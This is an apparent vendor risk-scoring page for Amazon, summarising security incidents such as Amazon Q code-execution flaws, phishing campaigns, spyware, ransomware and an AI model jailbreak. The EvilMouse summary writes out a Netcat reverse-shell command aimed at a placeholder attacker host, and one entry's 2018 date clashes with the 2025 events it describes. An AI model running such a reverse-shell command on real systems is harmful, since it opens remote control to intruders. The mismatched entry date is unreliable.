Amazon A.I CyberSecurity Scoring
Amazon
Company Information
Website:https://www.aboutamazon.com/
Employees number:781,092
Number of followers:36,921,378
NAICS:5112
Industry Type:Software Development
Homepage:aboutamazon.com
Amazon Risk Score (AI oriented)
Between 750 and 799
AmazonSoftware Development
Updated:
26/07/2026
26/07/2026
794/1000
Fair
Baa
Amazon Global Score (TPRM)
xxxx
AmazonSoftware Development
Score locked

AmazonFair
Current Score
794Baa (FAIR)
01000
15 incidents
-5 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
AUGUST 2026
796
JULY 2026
794
JUNE 2026
795
Vulnerability
26 Jun 2026 • Amazon
Amazon: Amazon Q Vulnerability Let Attackers Execute Code and Access Sensitive Cloud Environments
Critical Amazon Q Developer Vulnerabilities Exposed: Arbitrary Code Execution and Credential Theft Risks
793
CRITICAL-2
AMA1782498585
Critical Amazon Q Developer Vulnerabilities Exposed: Arbitrary Code Execution and Credential Theft Risks
Security researchers at Wiz Research disclosed two high-severity vulnerabilities in Amazon Q Developer, the AI-powered coding assistant for Visual Studio Code (VS Code), JetBrains, Eclipse, and Visual Studio. Tracked as CVE-2026-12957 and CVE-2026-12958, the flaws enabled arbitrary code execution and cloud credential theft when developers opened malicious repositories without user interaction or warnings.
### Root Cause & Exploitation
The vulnerabilities stemmed from Amazon Q’s automatic execution of MCP (Model Context Protocol) server configurations from `.amazonq/mcp.json` files in untrusted workspaces. Since spawned processes inherited the developer’s full environment, attackers could access:
- AWS credentials (`AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY`, `AWS_SESSION_TOKEN`)
- Cloud CLI authentication tokens
- API keys and secrets
- SSH agent sockets
A proof-of-concept demonstrated that a single malicious `.amazonq/mcp.json` file could exfiltrate AWS session credentials to an attacker-controlled server no clicks, prompts, or warnings required.
### Assigned CVEs & Affected Versions
- CVE-2026-12957: Improper trust boundary enforcement MCP configs executed without consent.
- CVE-2026-12958: Missing symlink validation, enabling path traversal outside workspace boundaries.
Affected products and versions:
- Language Servers for AWS < 1.69.0
- Amazon Q Developer for VS Code < 2.20
- Amazon Q Developer for JetBrains < 4.3
- Amazon Q Developer for Eclipse < 2.7.4
- AWS Toolkit with Amazon Q for Visual Studio < 1.94.0.0
### Attack Vectors
Researchers highlighted targeted exploitation methods, including:
- Malicious pull requests in popular open-source repositories
- Typosquatted packages embedding hidden `.amazonq/` configurations
- Fake job interview coding tests (a tactic previously used by DPRK-linked threat actors)
### Patch & Disclosure Timeline
- April 20, 2026: Vulnerability discovered by Maor Dokhanian (Wiz Research) and responsibly disclosed to Amazon.
- May 12, 2026: Amazon deployed an initial fix in Language Servers for AWS 1.69.0.
- June 26, 2026: Full public disclosure via Security Bulletin 2026-047-AWS.
The patch is automatically applied for most users upon IDE reload. No further action is required for those on updated versions.
### Broader Industry Risk
This vulnerability reflects a systemic issue in AI-powered coding tools. Similar flaws have been identified in:
- Claude Code (CVE-2025-59536, CVE-2026-21852 – Check Point Research)
- Windsurf (CVE-2026-30615 – OX Security)
All stem from auto-execution risks in untrusted configurations, underscoring the need for coordinated industry mitigation.
INCIDENT DETAILS -
TYPE
IMPACT
DATA BREACH
REFERENCES
JUNE 2026
795
Vulnerability
18 Jun 2026 • Amazon
Anthropic and Amazon: Inside Trump's Anthropic crackdown
U.S. Government Imposes Unprecedented Export Controls on Anthropic’s AI Models After Amazon-Discovered Jailbreak
794
CRITICAL-1
ANTAMA1783550443
U.S. Government Imposes Unprecedented Export Controls on Anthropic’s AI Models After Amazon-Discovered Jailbreak
In a historic move that could redefine U.S. AI regulation, the Trump administration imposed emergency export controls on Anthropic’s flagship AI models, Fable 5 and Mythos 5, just days after their release. The crackdown followed the discovery of a critical vulnerability by Amazon researchers, setting off a rapid chain of events that culminated in the first-ever government intervention to restrict a commercial AI model.
### The Trigger: A Jailbreak and a High-Level Warning
On June 9, Anthropic launched Fable 5, a "safe" version of its Mythos model, which the company had previously described as possessing "superhuman" cyberattack capabilities too dangerous for public release. However, during stress-testing, Amazon researchers uncovered a jailbreak that allowed users to bypass safety measures, potentially enabling cyberattacks. Amazon CEO Andy Jassy flagged the issue to White House officials during a pre-scheduled call on June 11, escalating concerns to Treasury Secretary Scott Bessent, who leads the administration’s response to AI-driven financial threats.
By June 14, the Commerce Department, led by Secretary Howard Lutnick, issued an ultimatum: Anthropic must either fix the vulnerability or remove the models from circulation. With no prior warning, the company was given 90 minutes to comply before export controls were enforced, effectively banning foreign nationals including Anthropic’s own employees from accessing the models. By 10 p.m. that evening, Fable 5 and Mythos 5 were taken offline.
### A Watershed Moment for AI Regulation
The decision marks the first time the U.S. government has directly intervened to block a commercial AI model, sparking global debate. While the administration cited national security risks, Anthropic argued that the jailbreak was narrow and easily replicable with other models, questioning the precedent set by the move. The company warned that applying such standards industry-wide could "halt all new model deployments" for frontier AI developers.
The controls also raised legal concerns. Experts, including Charlie Bullock of LawAI, argued that the Commerce Department’s use of export authorities originally designed for physical goods may not apply to publicly accessible AI systems, particularly those accessed via API. Some legal scholars suggested the move could face First Amendment challenges, as courts have previously treated computer code as protected speech.
### Industry Backlash and Geopolitical Fallout
Cybersecurity experts and industry leaders criticized the decision, warning it could undermine U.S. competitiveness and push innovation to rivals like China. Danny Jenkins, CEO of ThreatLocker, demonstrated how even Anthropic’s less powerful Claude model could be used to deploy ransomware, arguing that vulnerabilities will always exist whether discovered by humans or AI. The focus, he suggested, should be on hardening security, not restricting models.
The move also deepened tensions between Anthropic and the Trump administration, which had already clashed over the company’s Pentagon contracts and its refusal to allow its models for autonomous weapons or mass surveillance. In October, the administration labeled Anthropic a "supply chain risk", barring its use by the military and defense contractors a designation the company is challenging in court.
### Diplomatic and Corporate Repercussions
The fallout extended internationally. The U.S. had previously approved Anthropic’s Glasswing program, which granted Mythos access to 12 U.S. tech and financial firms (including Amazon and Microsoft) to help secure critical infrastructure. However, when Anthropic expanded the program to 111 global organizations including a South Korean telecom firm suspected of ties to China trust eroded. The administration demanded the company cut off access to the telecom, which SK Telecom denied having Chinese links.
At the G7 summit in France, Anthropic CEO Dario Amodei and President Trump found themselves in the same room, with Amodei seated across from OpenAI’s Sam Altman a rival who has avoided public comment on the feud. Amodei warned against "splintering" AI regulation, while reports emerged of ongoing negotiations between Anthropic and the U.S. to restore model access under a new framework for assessing jailbreak risks.
### What Comes Next?
As of June 20, the models remain offline, though Anthropic’s international managing director, Chris Cauri, expressed confidence they would be restored "in the coming days." The company continues discussions with the White House, but the path forward remains uncertain. The incident has exposed deep divisions over AI governance, with implications for national security, innovation, and global tech leadership setting the stage for future regulatory battles.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
REFERENCES
MAY 2026
794
APRIL 2026
800
Cyber Attack
16 Apr 2026 • Amazon
Amazon, Temu, Sam’s Club, Grubhub, Lyft, CountryMax and Elf Cosmetics: Misconfigured Server Run by Hackers Leaks 345,000 Stolen Credit Cards
AI Coding Error Exposes Massive Stolen Credit Card Database
793
HIGH-7
ELFTEMCOUGRUAMASAMLYF1777580773
AI Coding Error Exposes Massive Stolen Credit Card Database
On 16 April, cybersecurity researchers uncovered a misconfigured server linked to Jerry’s Store, a dark web carding marketplace where hackers verify stolen credit cards. The leak stemmed from an AI-assisted coding mistake, revealing the group’s entire database including 345,000 credit cards, of which 145,000 were active.
The hackers used Cursor, an AI-powered code editor, to build a statistics dashboard. However, the AI generated an unauthenticated open web directory instead of a secure page, exposing the server to public access. Researchers found that Cursor’s lack of safety guardrails allowed the tool to assist in criminal activity without intervention, despite recognizing its use for credit card fraud.
The group tested stolen cards by making small transactions on major platforms, including Amazon (US & JP), Grubhub, Sam’s Club, Temu, Lyft, Elf Cosmetics, and CountryMax. Successful payments confirmed a card’s validity, increasing its dark web value $7 to $18 per card, with the full dataset potentially worth $2.6 million.
The exposed data included card numbers, security codes, cardholder names, and home addresses. Jerry’s Store, launched in late 2023, appears to be operated by a Chinese-speaking individual, though the server was hosted in Germany, likely via a bulletproof hosting provider to evade detection.
While the incident highlights risks in AI-assisted development, researchers noted that the leak also disrupted criminal operations by exposing their methods. Cursor has not yet responded to the findings.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
MARCH 2026
801
Cyber Attack
01 Mar 2026 • Amazon
Amazon: Scammers pose as Amazon support to steal your account
Amazon Phishing Scam Targets Customers with Fake Product Recall Emails
796
CRITICAL-5
AMA1775744757
Amazon Phishing Scam Targets Customers with Fake Product Recall Emails
Cybercriminals are exploiting Amazon’s vast customer base reportedly 310 million active users by impersonating the retail giant in a wave of phishing attacks. The latest campaign uses a "product recall" lure, sending emails claiming a purchased item has a safety defect requiring immediate attention.
The fraudulent messages, spotted by The Mirror, read: “Dear Customer, we are writing to inform you of a product recall affecting an item from your March 2026 order due to a design defect that may pose a potential safety risk.” The emails are deliberately vague, increasing the likelihood that recipients will assume the notice applies to them. Links in the message redirect victims to fake Amazon login pages designed to steal credentials.
This tactic mirrors previous "spray and pray" phishing schemes, where scammers cast a wide net with generic but plausible messages. The holiday season saw a surge in Amazon account takeovers (ATOs), and this latest variation shows no signs of slowing.
Amazon customers who receive such emails are advised to avoid clicking links and instead verify messages through the official app or website. Legitimate communications from Amazon appear in the account’s Message Center. Those who fall victim should immediately change their passwords, enable two-factor authentication, and monitor financial accounts for unauthorized activity.
The scam has been reported in the UK, with similar tactics likely targeting users globally. Authorities recommend reporting phishing attempts to Amazon and forwarding suspicious texts or emails to designated spam-reporting channels.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
FEBRUARY 2026
801
Vulnerability
12 Feb 2026 • Amazon
Microsoft, Amazon and Apple: $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems
EvilMouse: A $44 USB Mouse That Silently Hijacks Systems
800
CRITICAL-1
AMAAPPMIC1770935300
EvilMouse: A $44 USB Mouse That Silently Hijacks Systems
Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures.
Unlike suspicious USB drives, EvilMouse retains normal mouse functionality optical tracking and buttons while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds.
The device executes DuckyScript-like sequences, including:
- Hidden PowerShell commands (`-WindowStyle Hidden -enc`)
- Base64-encoded payloads for obfuscation
- Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`)
- Persistence mechanisms (e.g., scheduled tasks)
In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma.
Security Implications
EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments.
Potential Defenses
- USB device whitelisting (Group Policy)
- Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)
- Physical port controls (Kensington locks)
The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses.
EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
REFERENCES
FEBRUARY 2026
807
Cyber Attack
10 Feb 2026 • Amazon
ConnectWise, Datto, SmartVault, SimpleHelp and Amazon: Microsoft Warns IRS Phishing Hits 29,000 Users, Deploys RMM Malware
Microsoft Warns of Tax-Season Phishing Surge Targeting U.S. Organizations
801
CRITICAL-6
SMASIMCONAMADAT1775551328
Microsoft Warns of Tax-Season Phishing Surge Targeting U.S. Organizations
Microsoft has identified a wave of phishing campaigns exploiting the U.S. tax season to steal credentials and deploy malware. Threat actors are leveraging urgent, time-sensitive lures such as fake refund notices, payroll forms, and IRS impersonations to trick recipients into interacting with malicious links, QR codes, or attachments.
The attacks disproportionately target accountants, tax professionals, and industries handling sensitive financial data, including manufacturing, retail, healthcare, and higher education. Some campaigns use Phishing-as-a-Service (PhaaS) platforms like Energy365 and SneakyLog (Kratos) to harvest credentials, including two-factor authentication (2FA) codes, via spoofed Microsoft 365 login pages. Others deploy remote monitoring and management (RMM) tools such as ConnectWise ScreenConnect, Datto, and SimpleHelp to gain persistent access to compromised systems.
Key campaigns include:
- CPA-themed phishing using the Energy365 kit, sending hundreds of thousands of malicious emails daily.
- QR code and W-2 lures targeting ~100 U.S. organizations in manufacturing, retail, and healthcare, redirecting victims to fake Microsoft 365 sign-in pages.
- IRS impersonation with cryptocurrency tax form scams, distributing ScreenConnect or SimpleHelp via domains like irs-doc[.]com.
- Datto malware delivery via fake tax-filing assistance links sent to accountants.
- A large-scale February 10, 2026, attack affecting 29,000 users across 10,000 organizations, primarily in financial services, tech, and retail. Emails, sent via Amazon SES, claimed irregular tax returns under recipients’ Electronic Filing Identification Numbers (EFINs) and directed users to a fake SmartVault site (smartvault[.]im) to download a malicious ScreenConnect installer.
The campaigns highlight a 277% year-over-year surge in RMM tool abuse, with attackers daisy-chaining multiple tools to evade detection. Since RMM software is often trusted in corporate environments, unauthorized usage can go unnoticed, complicating attribution and response efforts.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
FEBRUARY 2026
822
Breach
05 Feb 2026 • Amazon
Amazon: Employment information leaks: crisis management lessons from Amazon’s email blunder
Amazon’s Email Blunder Highlights Risks of Employment Data Leaks
806
HIGH-16
AMA1770339008
Amazon’s Email Blunder Highlights Risks of Employment Data Leaks
A recent misstep by Amazon underscored the severe consequences of accidental employment data leaks, demonstrating how a simple communications error can escalate into a full-blown crisis. The incident involved the premature or unintended disclosure of internal employee information likely through a leaked calendar invite or automated email triggering legal, reputational, and employee relations fallout.
Such breaches are particularly damaging in sectors like legal and corporate environments, where sensitive data handling is critical. The fallout from Amazon’s blunder serves as a cautionary example for organizations, emphasizing the need for robust crisis management protocols when handling confidential employee or client information.
The event also highlights broader cybersecurity risks facing industries reliant on digital communication, including the legal sector. As regulatory frameworks like GDPR (EU/UK) impose strict data protection requirements, organizations must prioritize compliance to mitigate risks of breaches, fines, and reputational harm. The UK’s Information Commissioner’s Office (ICO) remains a key authority overseeing such incidents, reinforcing the importance of proactive regulatory intelligence.
While the specifics of Amazon’s case remain under scrutiny, the incident reinforces the growing threat of human error in cybersecurity where a single oversight can have cascading effects. For businesses, the lesson is clear: even minor lapses in communication security can lead to significant legal and operational consequences.
INCIDENT DETAILS -
TYPE
IMPACT
DATA BREACH
REFERENCES
FEBRUARY 2026
827
Cyber Attack
02 Feb 2026 • Amazon
Google, Facebook, Instagram, Amazon, Flipkart, Paytm, Coinbase and PayPal: ZeroDayRAT Malware Strikes Android and iOS Devices for Real-Time Spying
ZeroDayRAT: A Rising Mobile Spyware Threat with Global Reach
822
CRITICAL-5
AMAINSCOIGOOFLIPAYPAYMET1771309885
ZeroDayRAT: A Rising Mobile Spyware Threat with Global Reach
Since February 2, 2026, ZeroDayRAT, a sophisticated mobile spyware platform, has been sold openly on Telegram channels, offering cybercriminals an accessible tool for large-scale surveillance and financial theft. Developed and marketed through dedicated groups for sales, support, and updates, the malware targets Android (versions 5–16) and iOS (up to version 26, including iPhone 17 Pro) with minimal technical expertise required.
Operators gain real-time control via a browser-based dashboard, enabling live spying, data theft, and financial attacks against victims worldwide. Infections typically begin through social engineering tactics, including smishing texts, phishing emails, fake app stores, or malicious links shared on WhatsApp and Telegram. Once installed via an APK on Android or a payload on iOS ZeroDayRAT grants full device access without the victim’s knowledge.
### Surveillance & Data Exfiltration Capabilities
The spyware’s dashboard provides a comprehensive overview of compromised devices, including:
- Device details: Model, OS version, battery level, country, lock status, SIM/carrier info, and dual-SIM numbers.
- User profiling: App usage timelines, peak activity hours, and network providers.
- Real-time notifications: Intercepted alerts from WhatsApp, Instagram, Telegram, YouTube, and system events.
- Location tracking: GPS data mapped on Google Maps, with historical movement records (e.g., a device in Bengaluru).
- Account harvesting: Usernames/emails from Google, WhatsApp, Instagram, Facebook, Amazon, Flipkart, PhonePe, Paytm, and Spotify enabling account takeovers or follow-up phishing.
- SMS access: Full inbox search, message spoofing, and OTP interception, bypassing SMS-based two-factor authentication (2FA).
### Advanced Surveillance & Financial Theft
ZeroDayRAT escalates beyond passive monitoring with active spying tools:
- Live camera/microphone streams (front/back) synced with GPS for real-time tracking.
- Keylogging: Captures keystrokes, biometrics, gestures, and app launches, paired with a live screen preview to steal passwords and sensitive inputs.
- Crypto theft: Targets wallets like MetaMask, Trust Wallet, Binance, and Coinbase, swapping clipboard addresses to hijack transactions.
- Banking attacks: Compromises UPI apps (PhonePe, Google Pay), Apple Pay, and PayPal via credential overlays, blending traditional and cryptocurrency theft.
### Global Impact
Evidence from the dashboard shows compromised devices in multiple countries, including India and the U.S., underscoring the spyware’s widespread deployment. With its low barrier to entry and commercial availability, ZeroDayRAT represents a growing threat to individual privacy, financial security, and organizational data integrity.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
FEBRUARY 2026
832
Cyber Attack
01 Feb 2026 • Amazon
Amazon: Meta AI agent’s instruction causes large sensitive data leak to employees
Meta AI Agent Exposes Sensitive Data in Internal Security Breach
822
LOW-10
AMA1773987972
Meta AI Agent Exposes Sensitive Data in Internal Security Breach
Meta confirmed an internal security incident in which an AI agent inadvertently exposed a large volume of sensitive company and user data to employees. The breach occurred when an engineer sought guidance on an internal forum, and the AI provided a solution that, when implemented, made the data accessible for two hours. While Meta stated that no user data was mishandled, the incident triggered a major security alert, underscoring the company’s focus on data protection.
The event is part of a growing trend of AI-related disruptions in major tech firms. Amazon recently experienced outages linked to its internal AI tools, with employees citing rushed deployments leading to errors and reduced productivity. The underlying technology, known as agentic AI, has advanced rapidly, enabling autonomous tasks like financial management and system operations but also introducing new risks. Recent examples include AI agents making unauthorized trades or deleting user data, fueling debates about artificial general intelligence (AGI) and its economic impact.
Experts suggest that companies like Meta and Amazon are in the "experimental phase" of AI deployment, often lacking proper risk assessments. Security specialists note that AI agents lack the contextual awareness of human engineers, relying instead on limited "context windows" that can lead to critical oversights. Unlike humans, who accumulate institutional knowledge over time, AI systems require explicit instructions to avoid unintended consequences making such incidents increasingly likely as adoption accelerates.
INCIDENT DETAILS -
TYPE
IMPACT
DATA BREACH
REFERENCES
JANUARY 2026
833
Vulnerability
26 Jan 2026 • Amazon
Cisco, City of Saint Paul and Minnesota: Ransomware crims abused Cisco 0-day weeks before disclosure
Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch
832
CRITICAL-1
CISSAI1773859283
Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch
Ransomware group Interlock exploited a maximum-severity zero-day vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center more than a month before the vendor released a patch. The flaw, allowing unauthenticated remote attackers to execute arbitrary Java code as root, was actively abused starting January 26, while Cisco issued fixes on March 4.
Amazon’s CJ Moses, CISO of Amazon Integrated Security, revealed the timeline, stating that the company’s MadPot honeypot network detected exploit traffic tied to Interlock’s infrastructure. A misconfigured server also exposed the group’s attack toolkit, providing defenders with critical intelligence.
### Interlock’s Tactics and Toolkit
Interlock, a ransomware crew active since 2025, has targeted hospitals, medical facilities, and government entities, disrupting critical services including chemotherapy sessions and pre-surgery appointments and leaking sensitive data. Victims include Davita (kidney dialysis), Kettering Health, and the city of Saint Paul, Minnesota, where a 43 GB data breach forced a state of emergency.
The group’s post-exploitation toolkit includes:
- A PowerShell script harvesting system details (OS, hardware, services, software, storage, VM inventory, user files, RDP logs, and browser data).
- Custom remote access trojans (RATs) in JavaScript and Java, providing persistent access, command execution, file transfer, and SOCKS5 proxy capabilities.
- A Bash script configuring Linux servers as reverse proxies, wiping logs, and ensuring persistence.
- Memory-resident backdoors and lightweight network beacons to evade detection.
- Legitimate tools like ConnectWise ScreenConnect, Volatility, and Certify to blend malicious activity with authorized remote access.
### Redundant Access and Extortion Tactics
Interlock deploys multiple backdoors including dual-language implants (JavaScript and Java) to maintain access even if one is detected. Their ransom notes threaten regulatory exposure, leveraging compliance violations alongside data encryption and leaks to pressure victims.
Cisco has updated its security advisory, urging customers to apply patches immediately. The incident underscores the growing sophistication of ransomware groups in exploiting zero-days before public disclosure.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
JANUARY 2026
838
Cyber Attack
19 Jan 2026 • Amazon
LastPass and Amazon Web Services: LastPass Warns of Fake Maintenance Message Tracking Users to Steal Master Passwords
Critical Phishing Campaign Targets LastPass Users in Sophisticated Attack
833
CRITICAL-5
LASAMA1769009064
Critical Phishing Campaign Targets LastPass Users in Sophisticated Attack
A high-severity phishing campaign targeting LastPass users began on January 19, 2026, with attackers impersonating the company’s support team to steal master passwords. The fraudulent emails falsely claim an urgent need for vault backups within 24 hours, leveraging social engineering to exploit user trust.
LastPass has confirmed that it never requests master passwords or demands immediate vault backups via email, emphasizing that legitimate communications avoid unsolicited urgent actions. The campaign was strategically launched over a U.S. holiday weekend, a tactic designed to capitalize on reduced security staffing and slower incident response times commonly exploited by threat actors to evade detection.
The phishing infrastructure relies on two key components: an initial redirect hosted on compromised AWS S3 buckets and a spoofed domain mimicking LastPass’s legitimate services. LastPass is actively working with third-party partners to dismantle the malicious infrastructure and urges users to delete any suspicious emails and report them to [email protected] for further analysis.
Organizations are advised to bolster email security controls to block messages from identified sender addresses and reinforce phishing awareness, particularly regarding urgent language and credential requests. The incident underscores the persistent risk of credential harvesting campaigns targeting password manager users.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
DECEMBER 2025
831
Vulnerability
25 Dec 2025 • Amazon
Amazon Web Services, Palo Alto Networks, Google Cloud and Wakefield Research: Every organization faced at least one AI-related cyberattack within the last year, says research
Increasing Attacks on AI Systems via Cloud Infrastructure Vulnerabilities
830
LOW-1
AMAUNIGOOWAK1766721300
AI Systems Under Siege: Every Organization Targeted in Past Year, Unit 42 Finds
A new report from Palo Alto Networks’ Unit 42 reveals a stark reality: every organization surveyed has faced at least one attack on its AI systems in the past year. The findings, derived from a survey of over 2,800 participants across 10 countries—including the U.S., UK, Germany, Japan, and India—highlight a growing and systemic vulnerability in AI security, with cloud infrastructure at the heart of the problem.
Conducted between September 29 and October 17, 2025, the research underscores that AI security cannot rely on reactive measures. Instead, organizations must adopt a proactive, scientific approach to safeguarding AI systems, given their complexity and critical applications. The report emphasizes that AI security is inherently tied to cloud infrastructure, where most AI workloads—data storage, model training, and application deployment—reside.
Cloud platforms like AWS, Microsoft Azure, and Google Cloud, while enabling AI scalability, also present prime targets for cyberattacks. Exploitable weaknesses in cloud security can lead to unauthorized access, data theft, or operational disruptions. Traditional security measures often fall short in addressing the unique challenges of AI, such as securing data pipelines, managing identities, and protecting cloud-hosted workloads.
The State of Cloud Security Report 2025 argues that the only effective defense is a holistic approach to cloud security, treating it as foundational to AI protection. This includes enforcing strong policies, encryption standards, regular audits, and isolating AI workloads from cloud vulnerabilities. As AI integrates deeper into sectors like healthcare, finance, and autonomous systems, the stakes rise—breaches could compromise sensitive data, disrupt services, or even endanger lives.
Emerging threats, such as adversarial attacks designed to manipulate AI models, further complicate the landscape. The report calls for collaboration between cloud providers, AI developers, and security teams to build robust frameworks and real-time threat detection tools. The future of AI security hinges on securing the cloud infrastructure that powers it, ensuring resilience against an evolving threat landscape.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
NOVEMBER 2025
831
OCTOBER 2025
830
SEPTEMBER 2025
830
JANUARY 2020
846
Data Leak
01 Jan 2020 • Amazon
Amazon
Amazon Employee Data Breach
815
MEDIUM-31
AMA21461222
Amazon had fired a number of employees after they shared customer email address and phone numbers with a third-party violating of their policies.
No other information related to account was shared.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
JUNE 2018
845
Breach
16 Jun 2018 • Amazon
TikTok and Amazon Europe Core: Breach Notifications in Europe Rise, While Fines Hold Steady
TikTok GDPR Violation for Data Transfers to China
823
CRITICAL-22
TIKAMA1769016582
GDPR Enforcement Remains Strong as Breach Notifications Surge in Europe
Data breach notifications across Europe rose by 20% over the past year, even as GDPR fines held steady at €1.2 billion ($1.4 billion) in 2025, according to a report by global law firm DLA Piper. The consistent enforcement levels signal sustained regulatory scrutiny, particularly in areas like AI, supply chain security, and international data transfers.
Ireland remained the most active enforcer, issuing the largest fine of 2025 €530 million against TikTok for storing European users’ data on Chinese servers between July 2020 and November 2022 without adequate safeguards or transparency. This marked the first major GDPR penalty for data transfers to a non-U.S. country, expanding concerns beyond transatlantic data flows. Ireland also leads in cumulative fines since GDPR’s 2018 inception, with €4 billion in sanctions, followed by France (€1.1 billion) and Luxembourg (€747 million).
Luxembourg’s largest fine €746 million against Amazon Europe Core in 2021 was upheld in March 2025 after the company’s appeal was dismissed. The case remains under seal due to local legal restrictions. Meanwhile, U.S. tech firms continued to face the highest penalties, reflecting persistent tensions over surveillance-driven business models.
The European Commission proposed GDPR reforms in November 2024 to simplify compliance, including a unified breach reporting platform managed by ENISA and an extended notification deadline from 72 to 96 hours. The changes aim to reduce overlapping obligations under GDPR, the Network and Information Security Directive 2 (NIS2), and the Digital Operational Resilience Act (DORA), though debates over balancing efficiency with privacy rights are ongoing.
In the U.K., enforcement under the post-Brexit Data (Use and Access) Act 2025 has drawn criticism. Over 70 civil society groups and experts urged Parliament to investigate the Information Commissioner’s Office (ICO) after it declined to probe the Ministry of Defense’s 2022 Afghan data breach, which exposed 19,000 individuals fleeing the Taliban. The U.K. government later imposed a super injunction to block public reporting. The new DUA Act, effective June 2025, introduces structural reforms to the ICO, including enhanced investigative powers and transparency requirements.
INCIDENT DETAILS -
TYPE
IMPACT
DATA BREACH
REFERENCES
JANUARY 2016
845
Cyber Attack
01 Jan 2016 • Amazon
Amazon
Amazon Customer Service Social Engineering Incident
843
CRITICAL-2
AMA0417522
Amazon’s customer service representative was tricked into disclosing Eric Springer, a user’s personal information by an attacker who used social engineering techniques.
The attack initiated through the mail ended up in the attacker getting the credit card details along with the address and other details.
The incident got all highlighted on the internet and people on the web demanded social engineering training to be given to employees to prevent any such incidents in the future.
INCIDENT DETAILS -
TYPE
MOTIVATION
IMPACT
DATA BREACH
REFERENCES
Frequently Asked Questions
?
What is the current A.I Rankiteo Cyber Score for Amazon ??
What was Amazon's A.I Rankiteo Cyber Score in July 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in June 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in May 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in April 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in March 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in February 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in January 2026 ??
What was Amazon's A.I Rankiteo Cyber Score in December 2025 ??
What was Amazon's A.I Rankiteo Cyber Score in November 2025 ??
What was Amazon's A.I Rankiteo Cyber Score in October 2025 ??
What was Amazon's A.I Rankiteo Cyber Score in September 2025 ??
What is the average per-incident point impact on Amazon's A.I Rankiteo Cyber Score over the past 12 months ??
Where can I access detailed records of all cyber incidents associated with Amazon ??
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology ??
Where can I view Amazon's profile page on Rankiteo ??
How accurate is the A.I Rankiteo Risk Scoring methodology ?